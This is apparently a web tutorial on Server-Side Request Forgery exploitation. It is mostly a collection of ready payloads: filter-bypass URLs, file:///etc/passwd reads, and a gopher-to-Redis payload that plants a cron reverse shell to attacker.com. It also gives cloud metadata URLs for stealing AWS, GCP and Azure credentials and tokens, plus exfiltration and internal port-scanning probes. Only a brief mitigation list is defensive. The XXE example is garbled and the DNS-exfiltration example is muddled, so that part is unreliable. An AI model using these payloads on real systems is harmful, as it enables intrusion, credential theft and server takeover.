SSRF Exploitation: Bypassing Filters & Cloud Metadata Attacks
Complete guide to Server-Side Request Forgery with advanced bypass techniques and cloud instance exploitation
Introduction to SSRF
Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to make requests from the server to internal or external resources. This can lead to:
- Internal network enumeration
- Cloud metadata exposure
- Remote code execution
- Sensitive data disclosure
Basic SSRF Exploitation
Common SSRF Vectors
| Vector | Example | Risk |
|---|---|---|
| URL Parameters | image?url=http://attacker.com |
External interaction |
| File Uploads | PDF generators, image processors |
Internal network access |
| Webhooks | callback URLs |
Internal service interaction |
Bypassing SSRF Filters
1. URL Obfuscation Techniques
# Using alternative IP formats
http://2130706433/ (127.0.0.1)
http://0x7f000001/ (127.0.0.1)
http://0177.0000.0000.0001/ (127.0.0.1)
# Using domain redirection
http://localhost@attacker.com
http://attacker.com#localhost
# Using URL encoding
http://%6c%6f%63%61%6c%68%6f%73%74 (localhost)
http://%32%31%37%2e%30%2e%30%2e%31 (127.0.0.1)2. Protocol Switching
# Using file protocol
file:///etc/passwd
# Using gopher protocol (for Redis, Memcached, etc.)
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
# Using dict protocol (for Redis, Memcached, etc.)
dict://127.0.0.1:6379/infoCloud Metadata API Exploitation
AWS Metadata Service
AWS metadata endpoint (v1 and v2) contains sensitive instance information:
# Classic metadata endpoint (v1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/identity-credentials/ec2/security-credentials/ec2-instance/
# IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/Bypassing IMDSv2: Some applications may automatically include the token header when making requests.
Google Cloud Metadata
GCP metadata endpoint contains similar sensitive information:
# Standard metadata endpoint
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# With required header
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/tokenAzure Metadata Service
Azure metadata endpoint provides instance information:
# Azure metadata endpoint
http://169.254.169.254/metadata/instance?api-version=2020-06-01
# With required header
curl -H "Metadata: true" http://169.254.169.254/metadata/instance?api-version=2020-06-01Blind SSRF Techniques
1. Time-Based Detection
Use response times to identify internal services:
# Test for open ports
http://internal-service:22
http://internal-service:80
http://internal-service:443
# Compare response times
- Fast response: Port likely open
- Slow response: Port likely filtered
- Timeout: Port likely closed2. DNS Exfiltration
Use DNS lookups to leak data:
# Leak data via subdomains
http://attacker-controlled.com/leak?data=secret
# The server will make DNS lookup:
secret.attacker-controlled.com3. Out-of-Band (OOB) Techniques
Use external services to detect interactions:
# Using Burp Collaborator
http://xyz.burpcollaborator.net
# Using interactsh
http://xyz.interact.sh
# Using DNS callback
http://attacker.com/$(hostname).xyzAdvanced Exploitation
1. Chaining with XXE
]>
&xxe; 2. Port Scanning Internal Networks
# Using HTTP redirects
http://target.com/redirect?url=http://192.168.1.1:22
# Using different protocols
dict://192.168.1.1:22/Mitigation Techniques
For Developers:
- Implement allowlists for user-supplied URLs
- Use proper URL parsing libraries
- Disable unused protocols (file, gopher, dict)
- Enforce authentication for metadata services
- Use network segmentation
For Pentesters:
Always test for SSRF in any functionality that makes external requests. Pay special attention to file processors, webhooks, and URL fetching features.
Conclusion
SSRF remains one of the most dangerous web vulnerabilities, especially in cloud environments. Understanding bypass techniques and cloud metadata services is crucial for both attackers and defenders.
